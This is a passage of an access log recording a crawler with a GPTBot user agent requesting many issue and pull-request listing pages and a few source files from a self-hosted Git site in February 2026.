192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=latest&state=all&type=all" +[17/Feb/2026:19:01:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:01:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:19:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&state=closed&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&state=closed&type=all" +[17/Feb/2026:19:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&state=closed&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&state=closed&type=all" +[17/Feb/2026:19:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10090] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:01:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:01:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:01:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:01:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:19:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:19:01:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10081] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:01:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10083] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:19:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 74.7.227.38] [Length 11790] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:19:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 74.7.227.38] [Length 11777] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:19:01:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:19:01:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md?display=source" [Client 74.7.227.38] [Length 15974] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:19:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10092] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:01:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10265] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" +[17/Feb/2026:19:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:01:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe?display=rendered" [Client 74.7.227.38] [Length 11097] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" +[17/Feb/2026:19:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:01:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:01:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:01:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:01:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:01:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:01:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:19:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9939] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:19:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11262] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:19:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat?display=source" [Client 74.7.227.38] 